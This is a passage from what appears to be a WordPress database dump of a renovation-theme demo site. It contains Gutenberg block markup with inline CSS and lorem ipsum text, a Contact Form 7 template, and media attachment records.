skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"topMarginMobile\":0,\"bottomMarginMobile\":0,\"blockId\":\"45c85db5-b91f-4431-bd7e-5ba9b5a45b13\"} -->\n<style type=\"text/css\"> .block-45c85db5-b91f-4431-bd7e-5ba9b5a45b13 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-45c85db5-b91f-4431-bd7e-5ba9b5a45b13 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-45c85db5-b91f-4431-bd7e-5ba9b5a45b13 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-45c85db5-b91f-4431-bd7e-5ba9b5a45b13 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-45c85db5-b91f-4431-bd7e-5ba9b5a45b13 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: 0px; margin-bottom: 0px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-45c85db5-b91f-4431-bd7e-5ba9b5a45b13\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":21,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/instruction-img.jpg\" alt=\"\" class=\"wp-image-21\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":5,\"rightPadding\":5,\"leftPaddingTablet\":5,\"rightPaddingTablet\":5,\"topPaddingMobile\":0,\"bottomPaddingMobile\":0,\"blockId\":\"f82dd4ec-7906-4c03-b1fd-205cbddf6ea8\",\"blockBorderRadius\":5} -->\n<style type=\"text/css\"> .block-f82dd4ec-7906-4c03-b1fd-205cbddf6ea8 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f82dd4ec-7906-4c03-b1fd-205cbddf6ea8 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f82dd4ec-7906-4c03-b1fd-205cbddf6ea8 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-f82dd4ec-7906-4c03-b1fd-205cbddf6ea8 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 5px; padding-right: 5px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-f82dd4ec-7906-4c03-b1fd-205cbddf6ea8 .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: 0px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f82dd4ec-7906-4c03-b1fd-205cbddf6ea8\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"align\":\"center\",\"id\":224,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><img src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-single.jpg\" alt=\"\" class=\"wp-image-224\"/></figure></div>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar andye pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra egetine vulputate ac, finieebus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee sempr lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero.</p>\n<!-- /wp:paragraph --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->','Plumbing','','inherit','closed','closed','','269-revision-v1','','','2021-05-28 05:45:24','2021-05-28 05:45:24','',269,'https://cteisys.com/?p=348',0,'revision','',0),(337,1,'2021-05-25 05:44:48','2021-05-25 05:44:48','<label> Your name\n    [text* your-name] </label>\n\n<label> Your email\n    [email* your-email] </label>\n\n<label> Subject\n    [text* your-subject] </label>\n\n<label> Your message (optional)\n    [textarea your-message] </label>\n\n[submit \"Submit\"]\n[_site_title] \"[your-subject]\"\n[_site_title] <wordpress@sktperfectdemo.com>\nFrom: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\n[_site_admin_email]\nReply-To: [your-email]\n\n0\n0\n\n[_site_title] \"[your-subject]\"\n[_site_title] <wordpress@sktperfectdemo.com>\nMessage Body:\n[your-message]\n\n-- \nThis e-mail was sent from a contact form on [_site_title] ([_site_url])\n[your-email]\nReply-To: [_site_admin_email]\n\n0\n0\nThank you for your message. It has been sent.\nThere was an error trying to send your message. Please try again later.\nOne or more fields have an error. Please check and try again.\nThere was an error trying to send your message. Please try again later.\nYou must accept the terms and conditions before sending your message.\nThe field is required.\nThe field is too long.\nThe field is too short.\nThere was an unknown error uploading the file.\nYou are not allowed to upload files of this type.\nThe file is too big.\nThere was an error uploading the file.','Contact form 1','','publish','closed','closed','','contact-form-1-2','','','2021-05-25 05:44:48','2021-05-25 05:44:48','',0,'https://sktperfectdemo.com/themepack/gbrenovate/?post_type=wpcf7_contact_form&amp;p=6',0,'wpcf7_contact_form','',0),(358,1,'2022-08-22 17:03:07','2022-08-22 17:03:07','','logo large','','inherit','','closed','','logo-large','','','2022-08-22 17:03:07','2022-08-22 17:03:07','',0,'https://cteisys.com/wp-content/uploads/2022/08/logo-large.jpg',0,'attachment','image/jpeg',0),(359,1,'2022-08-22 17:03:39','2022-08-22 17:03:39','','logo small','','inherit','','closed','','logo-small','','','2022-08-22 17:03:39','2022-08-22 17:03:39','',0,'https://cteisys.com/wp-content/uploads/2022/08/logo-small.jpg',0,'attachment','image/jpeg',0),(362,1,'2022-08-22 17:14:26','2022-08-22 17:14:26','','favicon2','','inherit','','closed','','favicon2','','','2022-08-22 17:14:26','2022-08-22 17:14:26','',0,'https://cteisys.com/wp-content/uploads/2022/08/favicon2.jpg',0,'attachment','image/jpeg',0),(363,1,'2022-08-22 17:14:51','2022-08-22 17:14:51','https://cteisys.com/wp-content/uploads/2022/08/cropped-favicon2.jpg','cropped-favicon2.jpg','','inherit','','closed','','cropped-favicon2-jpg','','','2022-08-22 17:14:51','2022-08-22 17:14:51','',0,'https://cteisys.com/wp-content/uploads/2022/08/cropped-favicon2.jpg',0,'attachment','image/jpeg',0),(367,1,'2022-08-22 19:20:10','2022-08-22 19:20:10','{\"version\": 2, \"isGlobalStylesUserThemeJSON\": true }','Custom Styles','','publish','closed','closed','','wp-global-styles-skt-gb-renovation','','','2022-08-22 19:20:10','2022-08-22 19:20:10','',0,'https://cteisys.com/2022/08/22/wp-global-styles-skt-gb-renovation/',0,'wp_global_styles','',0),(372,1,'2022-08-22 19:24:18','2022-08-22 19:24:18','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":50,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":50,\"className\":\"gb-renovation-services-single\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services-single skt-blocks-block-section-outer-wrap block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 50px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-0964fdc5-49d1-42e0-a4b1-b0a8aa0ee92f.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"099538db-2da2-4aaf-af99-326419f9d4ff\"} -->\n<style type=\"text/css\"> .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-099538db-2da2-4aaf-af99-326419f9d4ff .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-099538db-2da2-4aaf-af99-326419f9d4ff skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":33,\"rightPadding\":35,\"rightPaddingTablet\":20,\"blockId\":\"0c23ecb8-5eaa-4515-8b13-6026ea39bcce\"} -->\n<style type=\"text/css\"> .block-0c23ecb8-5eaa-4515-8b13-6026ea39bcce .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0c23ecb8-5eaa-4515-8b13-6026ea39bcce .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0c23ecb8-5eaa-4515-8b13-6026ea39bcce .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 35px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0c23ecb8-5eaa-4515-8b13-6026ea39bcce .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 20px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0c23ecb8-5eaa-4515-8b13-6026ea39bcce .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0c23ecb8-5eaa-4515-8b13-6026ea39bcce\" style=\"width:33%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:shortcode -->\n[footermenu menu=\"Services\"]\n<!-- /wp:shortcode --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":67,\"topPaddingMobile\":40,\"blockId\":\"0c855a8d-570f-4882-a246-257e7147b2d0\"} -->\n<style type=\"text/css\"> .block-0c855a8d-570f-4882-a246-257e7147b2d0 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-0c855a8d-570f-4882-a246-257e7147b2d0 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-0c855a8d-570f-4882-a246-257e7147b2d0 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-0c855a8d-570f-4882-a246-257e7147b2d0 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-0c855a8d-570f-4882-a246-257e7147b2d0 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0c855a8d-570f-4882-a246-257e7147b2d0\" style=\"width:67%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"d5a2705f-d0d5-4315-8283-66b54cdaf2c1\",\"showSubHeading\":false,\"showSeparator\":false,\"headSpacing\":10,\"headingTitleFontFamily\":\"Teko\",\"headingTitleFontSize\":52,\"headingTitleFontSizeMobile\":30,\"headingTitleFontSizeTablet\":32,\"headingTitleFontWeight\":\"700\",\"headingTitleLineHeight\":1.2,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#343434\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\",\"headingAlignmentMobile\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-title-text {\n font-size: 52px !important; margin-bottom: 10px !important; }\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-title-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-title-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 .responsive-heading-desc-text {\n font-size: undefinedpx !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1 {\n text-align: left; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-d5a2705f-d0d5-4315-8283-66b54cdaf2c1\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Teko;font-weight:700;line-height:1.2;letter-spacing:1px;color:#343434\">Fusce congue augue sollicitudin dignissim ultricies</h2></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Fusce congue augue sollicitudin dignissim ultricies. Pellentesque id tristique quam. Aliquam pharetra vehicula dolor, et dictum ante males mollis. Aenean ultricies vulputate urna eget fringilla.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"style\":{\"color\":{\"text\":\"#494848\"}},\"className\":\"section-content\",\"fontSize\":\"normal\"} -->\n<p class=\"section-content has-text-color has-normal-font-size\" style=\"color:#494848\">Morbi fringilla ex ut velit gravida, a tempus dui rutrum. Maecenas feugiatings lorem et neque tristique, pulvinar pulvinar ligula convallis. Mauris dictiumoe augue sed rhoncus ultricies. Donec mi purus, viverra eget vulputate ac, finiee</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"className\":\"section-content\"} -->\n<p class=\"section-content\">bus nec velit. Mauris hendrerit, neque eu dictum efficitur, ipsum urna andyee semper lorem, vitae hendrerit diam tortor nec nibh. Fusce a pharetra libero. Morbi rhoncus sem at ligula tempus varius. Cras erat ipsum, accpellentesque egestas a, condimen in ante. Quisque in felis quam. Cras at ultricie mi purus, viverra eget vulputate ac, finiee bus nec velit.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:skt-blocks/advance-columns {\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"113548b0-1e44-47c8-bc43-c0fedfe92d7d\"} -->\n<style type=\"text/css\"> .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-113548b0-1e44-47c8-bc43-c0fedfe92d7d .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-113548b0-1e44-47c8-bc43-c0fedfe92d7d skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"topPadding\":30,\"bottomPadding\":30,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"topPaddingMobile\":30,\"bottomPaddingMobile\":30,\"blockId\":\"a9418e2c-7f57-47f3-9fcc-613b1b98f206\"} -->\n<style type=\"text/css\"> .block-a9418e2c-7f57-47f3-9fcc-613b1b98f206 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-a9418e2c-7f57-47f3-9fcc-613b1b98f206 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-a9418e2c-7f57-47f3-9fcc-613b1b98f206 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-a9418e2c-7f57-47f3-9fcc-613b1b98f206 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-a9418e2c-7f57-47f3-9fcc-613b1b98f206 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-a9418e2c-7f57-47f3-9fcc-613b1b98f206\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/image-slider {\"gutter\":0,\"gutterMobile\":0,\"lightbox\":true,\"gridSize\":\"xlrg\",\"height\":500,\"autoPlay\":true,\"autoPlaySpeed\":\"3000\",\"borderWidth\":10,\"iconBackgroundRadius\":0,\"iconBackgroundOpacity\":100,\"iconBackgroundColor\":\"#ffffff\",\"borderColor\":\"#0d2e63\",\"iconColor\":\"#012257\",\"borderStyle\":\"solid\",\"counterId\":\"73265421-0369-4bd1-b7b6-c735abbd079f\"} -->\n<style type=\"text/css\"> .block-id-73265421-0369-4bd1-b7b6-c735abbd079f .flickity-button .flickity-button-icon {\n fill: #012257; 